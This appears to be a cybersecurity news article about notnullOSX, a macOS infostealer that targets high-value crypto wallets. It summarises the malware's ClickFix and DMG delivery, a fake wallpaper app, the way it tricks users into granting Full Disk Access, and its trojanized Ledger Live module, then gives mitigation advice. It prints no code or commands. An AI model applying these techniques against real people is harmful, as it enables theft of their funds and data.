In a concerning development for macOS users, cybersecurity researchers have uncovered a new information-stealing malware named notnullOSX, which specifically targets cryptocurrency holders with wallets exceeding $10,000. Notably, attackers have designed this threat with precision, combining advanced social engineering tactics with stealthy delivery mechanisms to compromise Apple systems.

To begin with, the malware—written in Go—uses two distinct yet equally effective attack methods. First, attackers leverage ClickFix social engineering, tricking victims into executing malicious commands. Meanwhile, the second approach involves distributing malicious DMG disk image files that appear legitimate. In both scenarios, victims unknowingly install the malware without triggering macOS security alerts, making detection extremely difficult.

The origins of notnullOSX date back to 2022, when a developer known as 0xFFF introduced an early version of a macOS stealer on underground forums. However, after a sudden disappearance in 2023—reportedly caused by a fabricated law enforcement tip—the developer vanished, leaving subscribers without refunds. Later, in August 2024, the same individual resurfaced under the alias alh1mik, apologized publicly, and began accepting preorders for an upgraded malware service priced at $400 per month. By 2026, that offering had evolved into the current notnullOSX campaign.

According to Moonlock Lab researchers, the first confirmed detections appeared on March 30, 2026, across Vietnam, Taiwan, and Spain. Their findings reveal a highly selective targeting process. Before launching an attack, operators must submit detailed victim profiles, including social media accounts, wallet addresses, and communication history. Importantly, the system automatically rejects targets with wallets below $10,000, highlighting the attackers’ focus on high-value victims.

The infection process typically starts with a fake Google document displaying an encryption error. Victims are then prompted to take action, which leads them down one of two malicious paths. In the ClickFix scenario, users paste a base64-encoded command into Terminal, unknowingly executing a remote script. Alternatively, the DMG route provides a seemingly harmless installer package that performs the same malicious activity.

Ad Banner

Furthermore, attackers have expanded their distribution strategy. They created a fake wallpaper application named “WallSpace,” hosted on a deceptive website, and promoted it via a hijacked YouTube channel. The video gained 50,000 views within two weeks, suggesting paid promotion or SEO manipulation tactics.

What makes notnullOSX particularly dangerous, however, is its ability to bypass macOS security controls. Instead of exploiting vulnerabilities directly, it manipulates users into granting Full Disk Access, effectively bypassing Apple’s Transparency, Consent, and Control (TCC) framework. Once granted, the malware gains unrestricted access to sensitive data without additional alerts.

Additionally, the malware operates using a modular architecture, downloading specific components from its command-and-control (C2) server for targeted data theft. One critical module, ReplaceApp, silently replaces legitimate applications such as Ledger Live with trojanized versions to capture seed phrases.

Beyond data theft, notnullOSX maintains persistent communication with its C2 server through WebSocket connections, enabling continuous monitoring and remote command execution—behavior typically associated with advanced remote access trojans.

To mitigate risks, Moonlock Lab advises organizations to block known C2 domains, monitor unusual Full Disk Access requests, and track suspicious activity in system directories. Meanwhile, individual users should avoid executing Terminal commands from untrusted sources and remain cautious of applications requesting excessive permissions.

Recommended Cyber Technology News:

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com  



🔒 Login or Register to continue reading